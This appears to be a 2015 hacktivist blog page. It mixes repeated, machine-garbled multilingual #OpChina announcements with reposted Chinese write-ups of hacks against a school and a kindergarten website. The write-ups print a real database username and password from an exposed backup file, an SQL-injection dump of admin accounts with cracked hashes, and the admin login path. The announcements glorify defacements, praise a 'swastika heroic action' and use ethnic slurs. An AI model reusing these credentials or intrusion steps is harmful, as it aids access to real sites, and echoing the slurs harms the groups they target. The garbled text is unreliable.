2015年6月30日 星期二

-Update[30/6/2015]-By our huge Anonymous #TangoDown by ''p@r@dox17'' .. #Palestine_DZ #AnonGhost #OpChina)-Our Hero fighting to Human Right and sharing the Chinese hackers portion lost China face! A variety of Chinese hacker rubbish programming ..you want to see the scandal open to the public ah...haha^^)- -更新[30/6/2015] - 通過我們的龐大的匿名#TangoDown由''P@R@ dox17''.. #Palestine_DZ#AnonGhost#OpChina) - 我們的英雄戰鬥人權和 分享了中國黑客部分失去中國的臉面!各種中國黑客垃圾programming..你們希望看到的醜事大公開啊...哈哈^^)- -Update [30/6/2015] -Mit unserer riesigen Anonymous #TangoDown durch '' p@r@dox17 ''..#Palestine_DZ #AnonGhost #OpChina) -Unsere Helden kämpfen, um Menschenrecht und die gemeinsame Nutzung der chinesische Hacker Teil verloren China Gesicht! Eine Vielzahl von chinesischen Hacker Müll programming..you möchte den Skandal die Öffentlichkeit zugänglich ah sehen...haha ^^)- -Update[30/6/2015] ''のp@Rの@のdox17''#Palestine_DZ #AnonGhost #OpChinaを)」-により、当社の巨大匿名#TangoDownを-by人権に戦っ-Ourヒーローと]中国のハッカー部分を共有することは中国の顔を失いました!中国のハッカーごみprogramming..youの様々な)^^ハハ...ああ公共に開放スキャンダルを見たいと思っています - -Mise À jour [30/6/2015] -Par notre immense Anonyme #TangoDown par '' p@r@dox17 ''..#Palestine_DZ #AnonGhost #OpChina) -Notre héros luttant pour droit de l'homme et partager la partie de pirates chinois a perdu la Chine visage! Une variété de pirate chinois ordures programming..you veulent voir le scandale ouvert au public ah...haha ​​^^) - -Update [30/6/2015] '피의@r에@를dox17'..#Palestine_DZ #AnonGhost #OpChina을) '에 의해 우리의 거대한 익명 #TangoDown을에 의하여 - 인권에 싸움 - 우리 영웅과-중국 해커 부분을 공유하는 것은 중국에게 얼굴을 잃었다! 중국어 해커 쓰레기 programming..you의 다양한) ^^ 하하...대중 아에게 공개 스캔들을보고 싶어-**All The World Lauguage**----Update 28/06/2015] - our friendly Anonymous huge chivalrous tribe legion "#TangoDown by "p@r@dox17 #opchina) - {we have fallen in love with his swastika heroic action #opchina}- ---更新28/06/2015]-我們的俠義友好匿名龐大部落軍團"#TangoDown by "p@r@dox17 #opchina)-{我們已愛上了他的卍英雄行動 #opchina }- ---Aktualisierung 29/06/2015] - unser freundliches Anonymous großen ritterlichen Stamm Legion "von #TangoDown" p@r@dox17 #opchina) - {wir in der Liebe mit seiner Hakenkreuz Heldentat #opchina gefallen}- **All The World Lauguage**-

-Update[30/6/2015]-By our huge Anonymous #TangoDown by ''p@r@dox17'' .. #Palestine_DZ  #AnonGhost  #OpChina)-Our Hero fighting to Human Right and
sharing the Chinese hackers portion lost China face! A variety of Chinese hacker rubbish programming ..you want to see the scandal open to the public ah...haha^^)-
-更新[30/6/2015] - 通過我們的龐大的匿名#TangoDown由''P@R@ dox17''..
#Palestine_DZ#AnonGhost#OpChina) - 我們的英雄戰鬥人權和
-Update [30/6/2015] -Mit unserer riesigen Anonymous #TangoDown durch '' p@r@dox17 ''..#Palestine_DZ  #AnonGhost  #OpChina) -Unsere Helden kämpfen, um Menschenrecht und die gemeinsame Nutzung der chinesische Hacker Teil verloren China Gesicht! Eine Vielzahl von chinesischen Hacker Müll programming..you möchte den Skandal die Öffentlichkeit zugänglich ah sehen...haha ^^)-
-Update[30/6/2015] ''のp@Rの@のdox17''#Palestine_DZ #AnonGhost #OpChinaを)」-により、当社の巨大匿名#TangoDownを-by人権に戦っ-Ourヒーローと]中国のハッカー部分を共有することは中国の顔を失いました!中国のハッカーごみprogramming..youの様々な)^^ハハ...ああ公共に開放スキャンダルを見たいと思っています -
-Mise À jour [30/6/2015] -Par notre immense Anonyme #TangoDown par
'' p@r@dox17 ''..#Palestine_DZ  #AnonGhost  #OpChina) -Notre héros luttant pour droit de l'homme et partager la partie de pirates chinois a perdu la Chine visage! Une variété de pirate chinois ordures programming..you veulent voir le scandale ouvert au public ah...haha ​​^^) -
-Update [30/6/2015] '피의@r에@를dox17'..#Palestine_DZ  #AnonGhost #OpChina을) '에 의해 우리의 거대한 익명 #TangoDown을에 의하여 - 인권에 싸움 - 우리 영웅과-중국 해커 부분을 공유하는 것은 중국에게 얼굴을 잃었다! 중국어 해커 쓰레기 programming..you의 다양한) ^^ 하하 ... 대중 아에게 공개 스캔들을보고 싶어-**All The World Lauguage**-

---Update 28/06/2015] - our friendly Anonymous huge chivalrous tribe legion "#TangoDown by "p@r@dox17 #opchina) - {we have fallen in love with his swastika heroic action #opchina}-
---更新28/06/2015]-我們的俠義友好匿名龐大部落軍團"#TangoDown by
"p@r@dox17 #opchina)-{我們已愛上了他的卍英雄行動 #opchina }-
---Aktualisierung 28/06/2015] - unser freundliches Anonymous großen ritterlichen Stamm Legion "von #TangoDown" p@r@dox17 #opchina) - {wir in der Liebe mit seiner Hakenkreuz Heldentat #opchina gefallen}-
---更新28/06/2015] - "によって#TangoDown「私たちのフレンドリーな匿名の巨大な騎士道部族の軍団P@ R@ dox17#opchina) - {私たちは彼の卍英雄的な行動#opchinaと恋に落ちています}-
---Mise à jour 28/06/2015] - notre sympathique Anonyme énorme légion de la tribu chevaleresque "#TangoDown par« p@r@dox17 #opchina) - {nous sommes tombés en amour avec sa croix gammée action héroïque #opchina}-
---업데이트 28/06/2015] - "에 의해 #TangoDown"우리의 친절한 익명 거대한 기사도 부족 군단 P@R@dox17 #opchina) - {우리는 그의 만자 영웅 액션 #opchina와 사랑에 빠졌어요}-**All The World Lauguage**-

---[24/06/2015]-Look at our great hero Anonymous "@DZ_paradox17 revenge demons Communist mainland Chinaman's denial of human rights the seven million people of Hong Kong and the mainland  peoples! demons Communist mainland Chinaman suffered to punish !! Anonymous will not forget! Anonymous will not forgive! We are Anonymous!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)-
---[24/06/2015]-看我們偉大的英雄匿名@DZ_paradox17的報復大陸妖魔共產黨支那人的剝奪香港7000000人口和大陸人民的人權,所受的懲罰!!匿名不會忘記!匿名不會原諒!我們是匿名!!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld) -
---[24/06/2015]-Schauen Sie sich unsere großen Helden Anonym "@DZ_paradox17 Rache Dämonen kommunistischen Festland Chinesen Verweigerung der Menschenrechte die sieben Millionen Menschen in Hongkong und dem Festland Völker! Dämonen kommunistischen Festland Chinesen erlitten zu bestrafen !! Anonymous werden nicht vergessen! Anonymous wird nicht vergeben! Wir sind Anonym!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)-
---[24/06/2015]-我々の偉大な英雄匿名"@DZ_paradox17の復讐の鬼を見共産本土人権の中国人の否定香港七万人と本土の人々!悪魔は共産本土中国人は処罰する苦しん!匿名は忘れません!匿名は許さありません!私たちは、匿名であります! -(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)-For My All Huge Anonymous-by the apple daily reported "CPPCC Ambrose name Kwun Tong industrial building in the whole block illegal Room!!"-& " Ping Theory: people vote for the Pan sword and shoe and, vote for establishment and other buried Uncle Fat!!{ Famous eidtor:Li Yi,Mr.}-**All The World Lauguage**- 

*-19/06/2015))And - Updated Anonymous @darkartsofwar from Twitter & @RedScareBot  - Latest News release - "The French state-owned assets freeze Russia, Moscow plans to appeal."- 和-19/06/2015)-更新來自Twitter的匿名@darkartsofwar & @RedScareBot發佈的最新資訊新聞-"法國凍結俄羅斯國有資產,莫斯科打算上訴 ."- Und-19/06/2015) - Aktualisiert Anonymous @darkartsofwar von Twitter & @RedScareBot - Aktuelle News Release - "Die Französisch staatlichen Vermögenswerte einfrieren Russland, Moskau plant, um zu appellieren."- と -19/06/2015)- 更新匿名@darkartsofwarはツイッター&@RedScareBotから - 最新のニュースリリース - 「フランス国有資産はロシアを凍結、モスクワアピールする計画です。」 -  Et -19/06/2015)- Mise à jour @darkartsofwar Anonyme de Twitter & @RedScareBot - Dernières Nouvelles de presse - "Les actifs appartenant à l'Etat français de geler la Russie, Moscou envisage de faire appel."- 그리고-19/06/2015) - 업데이트 익명 @darkartsofwar 트위터 & @RedScareBot에서 - 최신 뉴스 릴리스 - "프랑스 국영 자산을 동결 러시아, 모스크바 항소 할 계획이다."
---Update [18/06/2015] - accumulation of three Apple Daily reported, in which one the article referred to 'Snowdon this person, article content and other reports as may be said, and this positive news coverage. A reader review even say where the key,, and we feeling that 'Snowden' this people too bad, the reader wrote review, make we are feel the same,Really appreciates!!- The second is by Apple theme famous writers 'Gude Ming' Mr. write = "party rights and human rights!"- in third by Apple [Groups] freelance writer: "Harpo wrote "gorgeous set level !"--- and Update [18/06/2015] our dear friendly Anonymous chivalrous huge legion tribe released #OpChina #OpHongKong #OpHK #OccupyHK #HongKong #OperationHongKong,,Our conscience hero '' Kyfx ",," p@r@dox17 ",," @ZsgsDesign ,,))- ---更新[18/06/2015]-積存了三篇蘋果日報的報導,其中一篇提到'斯諾登這個人,文章內容可説與其他報導一樣,正面的新聞報導.而這篇的評論中,竟然有讀者説出其中要害關鍵,與我們對'斯諾登''這個人的感覺相同,真的不能不讚賞!第二篇是由蘋果專題著名作家'古德明'先生選寫的=黨權和人權!第三篇是由蘋果【網上論壇】自由撰稿人 :哈波寫的=華麗定下台階??-與更新[18/06/2015]我們親愛友好的匿名俠義龐大部落軍團發佈的 #OpChina #OpHongKong #OpHK #OccupyHK #HongKong  #OperationHongKong 我們的良知英雄''Kyfx",,"p@r@dox17",,"@ZsgsDesign,,))- ---Update [18/06/2015] - Anhäufung von drei Apple Daily berichtet, in dem man den Artikel genannten "Snowdon diese Person, Artikelinhalt und sonstigen Berichte, die gesagt werden, und dieses positive Berichterstattung. Ein Leser schreiben sogar sagen, wo der Schlüssel ,, und wir das Gefühl, dass "Snowden" dieses Volk zu schlecht, der Leser schrieb schreiben, machen wir das gleiche Gefühl, wirklich zu schätzen !! - Die zweite ist von Apple Thema berühmten Schriftsteller Gude Ming 'Mr. schreiben = "Partei und Menschenrechte!" - in Dritt von Apple [Groups] freier Schriftsteller: "Harpo schrieb" gorgeous eingestellten Wert "--- und Update [18/06/2015] unser lieber freundlich Anonymous ritterlich! riesigen Legion Stamm freigegeben #OpChina #OpHongKong #OpHK #OccupyHK #HongKong # OperationHongKong ,, Unser
Gewissen hero '' Kyfx ",," p@r@dox17 ",," @ZsgsDesign ,,)) - ---更新[18/06/2015] - 3アップルデイリーの蓄積は、記事がスノードン 'にこの人、記事の内容と言ってもよいように、他のレポート、この肯定的なニュース報道を呼ばれる1で報告しました。本当に感謝し、私たちは同じように感じている行い、読者のレビューは、場合でも、キーと言う,,私たちはあまりにも悪い「スノーデン」この人々は、読者がレビューを書いたことを感じ!! - 2番目のは、Appleのテーマで有名な作家のグーデ明によるものです'氏が=書き込み - アップルがサードで[グループ]フリーライター「党権と人権を!」:豪華なセットのレベルを「ハーポは書いた "" ---と更新[18/06/205]私たちの愛する優しい匿名騎士道!巨大な軍団の部族は#OpChina #OpHongKong #OpHK #OccupyHK #HongKong#OperationHongKongをリリースし,,私たちの良心の英雄 '' Kyfx",, "P@rをする@dox17 ",,"@ZsgsDesign ,,)) -All The World Lauguage**-
---Mise à jour [18/06/2015] - accumulation de trois Apple Daily a rapporté, dans lequel l'un l'article visé à 'Snowdon cette personne, le contenu de l'article et les autres rapports peut être dit, et cette couverture de nouvelles positives. Un examen du lecteur même dire où la clé ,, et nous le sentiment que 'Snowden' ce peuple trop mauvais, le lecteur écrit examen, faisons nous sommes du même avis, apprécie vraiment !! - La seconde est par Apple thème célèbres écrivains de Gude Ming M. écrire = "droits de tiers et droits de l'homme!" - troisième par Apple [Groupes] pigiste: "Harpo a écrit" superbe niveau de jeu "--- et mise à jour [18/06/2015] notre cher sympathique Anonyme chevaleresque! énorme tribu légion libéré #OpChina #OpHongKong #OpHK #OccupyHK #HongKong # OperationHongKong ,,Notre conscience héros '' Kyfx ",," p@r@dox17 ",," @ZsgsDesign ,,))-
---Actualización [18/06/205] - acumulación de tres Apple Daily informó, en el que uno del artículo se hace referencia »Snowdon esta persona, ya que puede decir el contenido del artículo y otros informes, y esta cobertura noticias positivas. Una revisión lector siquiera decir dónde está la llave,, y la sensación de que "Snowden" este pueblo está mal, el lector escribió opinión, hacemos somos siente lo mismo, realmente aprecia !! - El segundo es por Apple tema de escritores famosos 'Gude Ming 'El Sr. escribir = "derechos del partido y los derechos humanos!" - en el tercer por Apple [grupos] escritor independiente: "Harpo escribió" magnífico nivel establecido "---y Actualización [18/06/205] nuestro querido amigable Anonymous caballeroso! enorme tribu legión lanzado #OpChina #OpHongKong #OpHK #OccupyHK #HongKong # OperationHongKong ,, Nuestro héroe conciencia '' Kyfx ",," p@r@dox17 ",," @ZsgsDesign ,,))-
---업데이트 [18/06/2015은] - 세 애플 데일리의 축적이보고있는 한 기사는 '스노 든이 사람, 문서 내용과 다른 보고서라고 할 수있다로서 언급,이 긍정적 인 뉴스 보도. 정말 감사, 우리가 같은 느낌입니다 수 있도록, 독자 검토 경우에도 키라고 ,, 우리는 너무 나쁜 '스노우 든'이 사람들이, 독자가 리뷰를 쓴 느낌! - 두 번째는 애플의 테마 유명한 작가 'Gude 명나라입니다 "화려한 세트 수준"하포 쓴 "---및 업데이트 [18/06/205] 우리의 친애하는 친절한 익명 기사도 :! -!"자의 권리와 인권 "애플 [그룹] 프리랜서 작가에 의해 3 위 '씨는 = 쓰기 거대한 군단의 부족은 #OpChina #OpHongKong #OpHK #OccupyHK #HongKong #OperationHongKong을 발표 ,, ZsgsDesign @ 우리의 양심 영웅 ''Kyfx "
,,"p@r@dox17",,"@ZsgsDesign ,,))-
**All The World Lauguage**-

**Please use the Google god of high-tech translator to translate your national / local language ah ^^ -
**지역 / 국가 언어 ^^ 번역 하이테크 번역기의 구글 하나님을 사용하십시오 -
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**Fadlan isticmaal ilaah Google ee turjumaan farsmada heerka sare ah loo turjumi / ka ah luuqada maxaliga ah ee qaranka ^^-
**Gunakan dewa Google penerjemah berteknologi tinggi untuk menerjemahkan nasional / ah bahasa lokal ^^-
**Por favor, utilice el dios Google Traductor de alta tecnología para traducir su / ah nacional idioma local ^^-
**आफ्नो राष्ट्रिय / स्थानीय भाषा आह ^^ अनुवाद गर्न उच्च-प्रविधी अनुवादक को गुगल देवता प्रयोग गर्नुहोस् -
**Bonvolu uzi la Google dio de alta-tech tradukisto por traduki vian nacian / lokan lingvon ah ^^-

-Update[30/6/2015]-By our huge Anonymous #TangoDown by ''p@r@dox17'' .. #Palestine_DZ  #AnonGhost  #OpChina)-Our Hero fighting to Human Right and
sharing the Chinese hackers portion lost China face! A variety of Chinese hacker rubbish programming ..you want to see the scandal open to the public ah...haha^^)-
-更新[30/6/2015] - 通過我們的龐大的匿名#TangoDown由''P@R@ dox17''..
#Palestine_DZ#AnonGhost#OpChina) - 我們的英雄戰鬥人權和
-Update [30/6/2015] -Mit unserer riesigen Anonymous #TangoDown durch '' p@r@dox17 ''..#Palestine_DZ  #AnonGhost  #OpChina) -Unsere Helden kämpfen, um Menschenrecht und die gemeinsame Nutzung der chinesische Hacker Teil verloren China Gesicht! Eine Vielzahl von chinesischen Hacker Müll programming..you möchte den Skandal die Öffentlichkeit zugänglich ah sehen...haha ^^)-
-Update[30/6/2015] ''のp@Rの@のdox17''#Palestine_DZ #AnonGhost #OpChinaを)」-により、当社の巨大匿名#TangoDownを-by人権に戦っ-Ourヒーローと]中国のハッカー部分を共有することは中国の 顔を失いました!中国のハッカーごみprogramming..youの様々な)^^ハハ...ああ公共に開放スキャンダルを見たいと思っています - -Mise À jour [30/6/2015] -Par notre immense Anonyme #TangoDown par
'' p@r@dox17 ''..#Palestine_DZ  #AnonGhost  #OpChina) -Notre héros luttant pour droit de l'homme et partager la partie de pirates chinois a perdu la Chine visage! Une variété de pirate chinois ordures programming..you veulent voir le scandale ouvert au public ah...haha ​​^^) -
-Update [30/6/2015] '피의@r에@를dox17'..#Palestine_DZ  #AnonGhost #OpChina을) '에 의해 우리의 거대한 익명 #TangoDown을에 의하여 - 인권에 싸움 - 우리 영웅과-중국 해커 부분을 공유하는 것은 중국에게 얼굴을 잃었다! 중국어 해커 쓰레기 programming..you의 다양한) ^^ 하하 ... 대중 아에게 공개 스캔들을보고 싶어-**All The World Lauguage**-

---Update 28/06/2015] - our friendly Anonymous huge chivalrous tribe legion "#TangoDown by "p@r@dox17 #opchina) - {we have fallen in love with his swastika heroic action #opchina}-
---更新28/06/2015]-我們的俠義友好匿名龐大部落軍團"#TangoDown by
"p@r@dox17 #opchina)-{我們已愛上了他的卍英雄行動 #opchina }-
---Aktualisierung 28/06/2015] - unser freundliches Anonymous großen ritterlichen Stamm Legion "von #TangoDown" p@r@dox17 #opchina) - {wir in der Liebe mit seiner Hakenkreuz Heldentat #opchina gefallen}-
---更新28/06/2015] - "によって#TangoDown「私たちのフレンドリーな匿名の巨大な騎士道部族の軍団P@ R@ dox17#opchina) - {私たちは彼の卍英雄的な行動#opchinaと恋に落ちています}-
---Mise à jour 28/06/2015] - notre sympathique Anonyme énorme légion de la tribu chevaleresque "#TangoDown par« p@r@dox17 #opchina) - {nous sommes tombés en amour avec sa croix gammée action héroïque #opchina}-
---업데이트 28/06/2015] - "에 의해 #TangoDown"우리의 친절한 익명 거대한 기사도 부족 군단 P@R@dox17 #opchina) - {우리는 그의 만자 영웅 액션 #opchina와 사랑에 빠졌어요}-**All The World Lauguage**-

--[24/06/2015]-Look at our great hero Anonymous "@DZ_paradox17 revenge demons Communist mainland Chinaman's denial of human rights the seven million people of Hong Kong and the mainland  peoples! demons Communist mainland Chinaman suffered to punish !! Anonymous will not forget! Anonymous will not forgive! We are Anonymous!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)- ---[24/06/2015]-看我們偉大的英雄匿名@DZ_paradox17的報復大陸妖魔共產黨支那人的剝奪香港7000000人口和大陸人民的人權,所受的懲罰!!匿名不會忘記!匿名不會原諒!我們是匿名!!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld) - ---[24/06/2015]-Schauen Sie sich unsere großen Helden Anonym "@DZ_paradox17 Rache Dämonen kommunistischen Festland Chinesen Verweigerung der Menschenrechte die sieben Millionen Menschen in Hongkong und dem Festland Völker! Dämonen kommunistischen Festland Chinesen erlitten zu bestrafen !! Anonymous werden nicht vergessen! Anonymous wird nicht vergeben! Wir sind Anonym!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)- ---[24/06/2015]-我々の偉大な英雄匿名"@DZ_paradox17の復讐の鬼を見共産本土人権の中国人の否定香港七万人と本土の人々!悪魔は共産本土中国人は処罰する苦しん!匿名は忘れません!匿名は許さありません!私たちは、匿名であります! -(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)-For My All Huge Anonymous-by the apple daily reported "CPPCC Ambrose name Kwun Tong industrial building in the whole block illegal Room!!"-& " Ping Theory: people vote for the Pan sword and shoe and, vote for establishment and other buried Uncle Fat!!{ Famous eidtor:Li Yi,Mr.}-**All The World Lauguage**-
*-19/06/2015))And - Updated Anonymous @darkartsofwar from Twitter & @RedScareBot  - Latest News release - "The French state-owned assets freeze Russia, Moscow plans to appeal."- 和-19/06/2015)-更新來自Twitter的匿名@darkartsofwar & @RedScareBot發佈的最新資訊新聞-"法國凍結俄羅斯國有資產,莫斯科打算上訴 ."- Und-19/06/2015) - Aktualisiert Anonymous @darkartsofwar von Twitter & @RedScareBot - Aktuelle News Release - "Die Französisch staatlichen Vermögenswerte einfrieren Russland, Moskau plant, um zu appellieren."- と -19/06/2015)- 更新匿名@darkartsofwarはツイッター&@RedScareBotから - 最新のニュースリリース - 「フランス国有資産はロシアを凍結、モスクワアピールする計画です。」 -  Et -19/06/2015)- Mise à jour @darkartsofwar Anonyme de Twitter & @RedScareBot - Dernières Nouvelles de presse - "Les actifs appartenant à l'Etat français de geler la Russie, Moscou envisage de faire appel."- 그리고-19/06/2015) - 업데이트 익명 @darkartsofwar 트위터 & @RedScareBot에서 - 최신 뉴스 릴리스 - "프랑스 국영 자산을 동결 러시아, 모스크바 항소 할 계획이다."* 

   #OpHK     #opchina


xss in site israhell ... :3 by p@r@dox17

hello china .. by p@r@dox17 ..

hello china .. by p@r@dox17 ..


 ‏@Ebru_Polat 6月30日
We want you to stop the persecution of the East Turkestan





 ‏@JuN0NN 5小時
God Muderers and chldren shouldnt be in the same unverse.Either the muderers have todie or the chldren sholdn't be born

  China rubbish programming ..
 From: Chinese hackers unitLove invasion alone resolve domestic website was hacked2015-7-1 03: 25 | Publisher: yxcker.
 Abstract: Today to see Daniel at ZONE-H accident saw domestic hackers Qucourenao! Surprisingly, domestic sites! Submit loaded to force home you can submit ZONE-H is called the lost dozens of Chinese face the invasion site, we will choose a random analysis under the bar. 11 Middle School in Shijiazhuang City, the fourth http://www.41zhong.com/ leak ...
Today to see Daniel at ZONE-H accident saw domestic hackers Qucourenao! Surprisingly, domestic sites! Submit loaded to force home you can submit ZONE-H is called the lost China face!

 Invasion of dozens of websites, we choose a random analysis under the bar.
 Shijiazhuang City, the fourth 11 Middle Schoolhttp://www.41zhong.com/

 Vulnerability: SQL injection vulnerabilities, command execution, code execution, the file contains any file operations, permission to bypass the logical flaw ,, file upload, weak passwordsDetected vulnerabilities: file contains: http://www.41zhong.com/web.rar website backup files exposedSince the whole point to get a site database then we stormed it.
 Const SqlUsername = "www41zhongcom"      'SQL database user name
Const SqlPassword = "www41zhongcom"       'SQL database user password
Const SqlDatabaseName = "www41zhongcom"       'SQL database name
Const SqlHostIP = ""                   'SQL host IP address.

 Just find the account and then break CMD5 successful landing.


 来自: 中国黑客部


2015-7-1 03:25| 发布者: yxcker 摘要: 今天在ZONE-H看大牛意外看见国内的黑客也去凑热闹! 居然还是国内的网站!提交国内你可以装逼,提交ZONE-H那叫丢中国脸入侵网站几十条,我们就随便选择一个分析下吧。石家庄市第四十一中学http://www.41zhong.com/漏 ...
 今天在ZONE-H看大牛意外看见国内的黑客也去凑热闹! 居然还是国内的网站!提交国内你可以装逼,提交ZONE-H那叫丢中国脸.


检测到漏洞:文件包含: http://www.41zhong.com/web.rar 网站备份文件暴露

Const SqlUsername = "www41zhongcom"           'SQL数据库用户名
Const SqlPassword = "www41zhongcom"          'SQL数据库用户密码
Const SqlDatabaseName = "www41zhongcom"       'SQL数据库名
Const SqlHostIP = ""                'SQL主机IP地址。


China  rubbish programming ..hahaha.......
 Turkish hackers Huaihua City of Hexi children website was hacked Analysis Report !
 I am in a foreign country to see the Turkish invasion of black Chinese statistics website.

 We can see from the chart page is linked page, but not the whole page, which is why? Very simple yet getshell # no shell can not modify the complete information page.We can also come to see the following information is a nursery site! The top Turkish and Chinese star, also stained with blood! Turkey contaminated Chinese spread sensitive information, TMD earth wide, not sparing even the Chinese Kindergarten!Hackers unit you need to purify the Internet to remove sensitive information support management of it, it would have required invaded! Soil wide like sql injection H black sites, then we try to SQL injection.OK obtained by detecting the database:Database: a8126[9 tables]+ --------------------------------------- +| Comment || Config || Log || Loginerror || Members || Part || Partdata || Session_online || Swap |+ --------------------------------------- +Administrator information:Database: a8126Table: members[3 entries]+ ----------- + ---------------------------------- +| Loginname | loginpassword |+ ----------- + ---------------------------------- +| Admin | e10adc3949ba59abbe56e057f20f883e (123456) || Test11 | e10adc3949ba59abbe56e057f20f883e (123456) || User001 | e10adc3949ba59abbe56e057f20f883e (123456) |+ ----------- + ---------------------------------- +CNM! Engage in a long time is a weak password!The default background path admin.php.
Successful landing!
Login to come then? We went to the top of the hanging sucker earth wide information code!
OK we have found the code, then we deleted!
OK site restoration is complete, the above can be obtained from the invasion of unsafe information:1.SQL injection vulnerability.2.CMS developers improper maintenance and operation, TMD stay backdoor account.3. weak passwords!Chinese hackers unit to maintain network security, but also nursery a FUCK""haha... world! Testing has been completed!


 土耳其黑客入侵怀化市河西幼儿网站被黑分析报告 !



 我们从上图可以看出首页被挂页,但并非全页,这是为什么? 很简单还没getshell#没有shell无法修改完整首页信息。

大家也可以看出下面得出信息是一个幼儿园网站! 而顶部是土耳其和中国红星,还染了血!土耳其污染中国传播敏感信息,TMD土阔连中国幼儿园都不放过!

黑客部那么需要净化网络辅助管理去掉这些敏感信息吧,那就得需要入侵了! 土阔喜欢sql注射H黑网站,那么我们就先SQL注射试试看.

OK 通过检测得出数据库:
Database: a8126
[9 tables]
| comment                               |
| config                                |
| log                                   |
| loginerror                            |
| members                               |
| part                                  |
| partdata                              |
| session_online                        |
| swap                                  |

Database: a8126
Table: members
[3 entries]
| loginname | loginpassword                    |
| admin     | e10adc3949ba59abbe56e057f20f883e(123456) |
| test11    | e10adc3949ba59abbe56e057f20f883e (123456)|
| user001   | e10adc3949ba59abbe56e057f20f883e (123456)|
CNM! 搞半天是弱口令!
默认后台路径 admin.php

登陆进来然后呢? 我们去找傻逼土阔挂的顶部信息代码!
OK 我们找到了代码,然后我们删除!

OK 网站恢复完成,从上面入侵可以得出那些不安全信息:


 China rubbish programming ..hahahaha....
 Hackers People's Republic of China Ministry - the Ministry of Domestic Chinese hackers hacking open letter - published in 2015-6-11)!!!wahahahaha ........ crazy or mad ??silly ..... fool ......!!!Chinese hackers unit is the most authoritative patriotic hackers, we do not just simply like hackers, our members are for patriotic action took hackers road, we do not like hackers, hacker just to reach our aim must have a means of We could not bear the news, our hearts excitement want to do something for the motherland, to defend ethnic dignity, entertainment hobby network security.Chinese hackers unit is the most powerful hacker organization the most authoritative computer enthusiast inspirational and patriotic youth formed.Chinese hackers Ministry rejected black business chain, the development of Chinese high-profile hacker spirit and maintenance of network information security.Each member of the Department of Chinese hackers have amazing story of the storm experienced hacker, hacker unit gathered the most traditional hacker landscape,Chinese hackers section where you can see the complete list of the world's hackers dynamic.Chinese hackers unit revamped hacker network information security forum, understand the site as a hacker please leave, please understand hacker is doing damage to boiling.Chinese hackers unit, please do not insult hacker prompt and correct misconceptions in China.Chinese hackers brand new complimentary full range of network security video technology knowledge and information articles.Chinese hackers unit at the same time kinda latest security consultative information, hackers entertainment gossip press, tracking hacking incident, warm counter foreign hackers to Chinese attacks.Chinese hackers unit not associated with any domestic hacker organization, members of the Department are all patriotic hackers love love entrepreneurial network inspirational youth groups.Chinese hackers attack of severe contempt domestic incident, love network, friends, love hackers, love China!As this is the third generation of hacker unit, to maintain safe and harmonious blue Reed green free to share the enthusiasm of the hot word development, and always do the best hacker organization, not hackers.Private employment is not no business without politics does not startle the line and maintaining national dignity and maintain a national image has been trying to oppose hegemonism.Hackers unit has participated in every patriotic action:The first generation: Sino-US hacker warsThe second generation: the date hackingThird Generation: 2008 to participate in the Philippines Huangyan Island Event
2012 participate in the patriotic hacking Japan Diaoyu Islands
2013 participated in 918 patriotic hacking attack Japanese Shrine
October 2014 to act independently in support of patriotic hackers counter accounted for the Hong Kong International hacker organization Anonymous
Turkey in March 2015 to participate in the invitation to the international hacker hacker joint action to counter the terrorist organization Islamic State of ISIS
In May 2015 to participate in the counterattack the Philippines, Vietnam, China attacked anonymity network #op CHINA action.Here some of the foundation of our patriotism and inspirational in the name of nationalism, we received more solidarity and Chinese people are the real side, we come from all over China to defend the dignity and territory only for one purpose.Hereby hacker circles today is dilapidated mess mixed fish heads, many for the benefit of the illegal organization under the banner of the name of the hacker network swindling, announced for this unit and the hacker network entertainment business circles and draw a line.Domestic hackers open letter:1. hacker unit does not recruit any members, while not organize teams, patriotic action started from like-minded people will participate hacker unit.2. Hackers Hackers portion does not involve any illegal business, do not open the hacker training, no contact with the black industry, do not take a single hacker business.3. hacker unit not associated with any domestic hackers, hacker unit belonging to the pure independent patriotic hackers, but we do not just have a patriotic hackers hacking techniques.The hacker does not contact and involved in any domestic hackers, and it does not organize coalitions and alliances, while not extend hacker unit does not have a relationship with any national organization.5. hacker unit is not involved in any internal political events involved, do not participate in any national organizations hacking initiated.Hackers Ministry of Public Security disclosed Cooperation Agreement:February 2015 officially set sail hacker network collaboration joint Ministry of Public Security cracked Criminal CooperationChinese hackers insist on the official website of the Ministry of inherited non-infringement legal informationChinese hackers unit's members adhere to legal services in the manufacturers safety testingChinese hackers Ministry of Public Security cooperation in criminal cases to adhere to the conservative evidence is not compromisedChinese hackers Ministry of Public Security obey all directives issued a mandate and other services to governmentChinese hackers unit to ensure that no contact with any individuals and organizations hackersChinese hackers unit adherence to reject the illegal trade of trafficking and other illegal activities Site data occursChinese hackers Ministry of Public Security cooperation conserved non-disclosure reference informationChinese hackers unit does not take any counter-attacker formal legal way to solveChinese hackers unit not with any commercial type of malicious destruction of the illegal invasion of websiteNot with the destruction and damage to the disclosure of confidential guarantee safety testing Chinese hackers unitChinese hackers unit to comply with the party's belief in the auxiliary police closed joint network detectionChina strictly abide by computer hackers Ministry legitimate user manual stick to the lawful use of computerHackers Ministry Mission:Safety Green Free Green Reed shared a warm and harmonious development of hot words, and always do the best hackers, while focusing on national security, love the motherland and information security, love the application of research to explore and share security, assist manufacturers, enterprises, government Organs and other Internet security threats, counter foreign hackers!Hackers section contains only people like us, like-minded non-pure hackers blooded patriotic inspirational abroad wanted to do things we do not optimistic about the synergies comment.If you're like us can join hacker unit QQ group: 201 061 751 Chinese hackers unit contact the main group along with China's best network security team, I dream sway youth.

 中華人民共和國黑客部 - 中國黑​​客部國內黑客公開信 - 發表於2015年6月11日)!!!wahahahaha ........瘋狂的瘋狂還是?傻的傻瓜.......!!!


